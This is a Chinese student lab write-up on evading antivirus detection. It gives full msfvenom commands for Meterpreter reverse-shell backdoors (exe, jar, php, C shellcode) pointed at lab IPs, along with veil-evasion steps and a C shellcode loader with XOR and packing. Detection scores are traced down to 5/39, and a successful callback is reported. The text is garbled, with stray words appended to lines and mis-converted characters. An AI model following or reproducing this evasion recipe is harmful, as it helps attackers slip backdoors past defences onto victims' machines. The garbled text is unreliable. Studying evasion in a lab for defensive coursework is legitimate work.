(1)殺軟是如何檢測出惡意代碼的?php
(2)免殺是作什麼?html
就是利用一些手段假裝咱們的後門文件,最終達到其潛伏在被控主機中且不被被控主機中的殺毒軟件檢測出來。java
(3)免殺的基本方法有哪些?python
返回目錄shell
(1)正確使用msf編碼器編程
可見不加任何處理的後門程序可以被絕大多數殺毒軟件識別,那麼咱們嘗試用msf編碼器對後門程序進行一次到屢次的編碼,看看是否對免殺有所做用。windows
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.217.128 LPORT=443 -f exe > met-encoded10.exe
編碼十次後生成的可執行文件以下所示:tcp
將編碼十次後的可執行文件上傳到VirusTotal掃描後結果以下:工具
可見,編碼對免殺沒有太大效果,緣由在於msfvenom會以固定的模板生成exe,全部它生成的exe,若是使用默認參數或模板,也有必定的固定特徵。因此通常來講AV廠商會針對其使用的模板來生成特徵碼,這樣就一勞永逸地解決全部msfvenom生成的惡意代碼了。學習
(2)msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor_java.jar
生成的文件以下:
(3)msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.217.128 lport=443 x> 20155312_backdoor.php
生成的文件以下:
(4)msfvenom生成shellcode
msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.217.128 lport=443 -f c
生成的shellcode以下:
【其餘更多文件能夠參考狄唯佳同窗的博客】
(5)veil-evasion
1.首先下載veil,由於耗時過久網又太爛,因此用了老師的虛擬機,修改主機名的步驟以下:
2.第二步,咱們有了實驗所需的veil工具後,首先要啓用veil,輸入命令:veil
;接着進入veil-evasion,在veil中輸入命令:use evasion
,以下圖所示:
3.輸入命令:use python/meterpreter/rev_tcp.py
用python語言重寫meterperter【注:這裏用python後面會出錯哦,不想嘗試錯誤的話,直接把python改爲c就好啦】,以下圖所示(此時輸入提示變爲「[python/meterpreter/rev_tcp>>]」):
4.設置反彈鏈接IP,命令爲:set LHOST 192.168.217.130
,注意此處的IP是KaliIP;
5.設置端口,命令爲:set LPORT 5312
6.輸入generate
生成文件,接着輸入你想要playload的名字:playload5312
7.選擇第一種默認方式生成:1
8.生成失敗(以下圖),換個方式重試,依次輸入以下命令:veil
->use evasion
->list
->use 28
->set LHOST ……
->set LPORT ……
->generate
->【輸入名稱】
->1
嘗試後一樣不能夠,以下圖所示:
9.這說明應該是python這種語言不能夠,因此按照一樣的方法,咱們選擇別的語言,例如「c」試一下,就是把use 28
改爲use 7
,或在第一種方法中把use python/meterpreter/rev_tcp.py
改爲use c/meterpreter/rev_tcp.py
,其餘步驟徹底相同,最終成功的樣子是這樣滴:
10.去/var/lib/veil/output/compiled/playload5312.exe這個路徑下找咱們生成的exe文件,很差找的話直接使用命令:cp -r /var/lib/veil/output/compiled/playload5312.exe ~/zjy
把這個文件複製到咱們熟悉的路徑下就能夠啦~
11.最終用virscan工具查下試試,有沒有起到免殺的效果,結果以下,10/39查出:
(6)C語言調用Shellcode版本
1.首先使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.130 LPORT=5312 -f c
用c語言生成一段shellcode;
2.建立一個文件20155312.c,而後將unsigned char buf[]賦值到其中,代碼以下:
unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 乖巧的遵從老師指示,不能粘c代碼,此處省略 "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
3.使用命令:i686-w64-mingw32-g++ 20155312.c -o 20155312.exe
編譯這個.c文件爲可執行文件:
4.在掃描軟件上看看,有沒有免殺,9/39有點做用:
先嚐試只對shellcode進行加殼,掃描結果爲8/39:
利用C語言調用Shellcode+異或+加殼實現了免殺,殺軟掃描結果以下:
工具檢測結果以下:5/39,仍是有五個能夠檢測出來的。
殺軟名稱:360,版本:11(11.0.0.2001)
用電腦實測回連成功截圖以下:
感受本身如今也只是會參考其餘同窗的博客,看看別人怎麼實現了免殺本身再按照那個方向試試,可是缺少本身的想法,真正的實戰確定是要啃難啃的骨頭,別熱嚼碎了的東西確定是沒有太大價值的,我以爲本身要是想真正具有上戰場的能力,仍是要多查詢資料,多動腦。
此外,雖然程序可以實現免殺,但如何讓被控主機運行它也是一個問題,因此接下來要對如何假裝、吸引被供給端點擊這方面進行學習,我以爲這也是本身離實戰缺少的技術。
經過本次實驗,我瞭解到了免殺的概念、免殺的方法,熟練掌握了使用 VirusTotal、Virscan這些工具的方法,可以有條理、有目的的對後門動手實現一些免殺的處理,再一次溫習了實驗二中主機之間監聽、控制的操做,加深了印象,總之,通過此次實練本身的動手能力和對知識的理解程度有了必定的提高。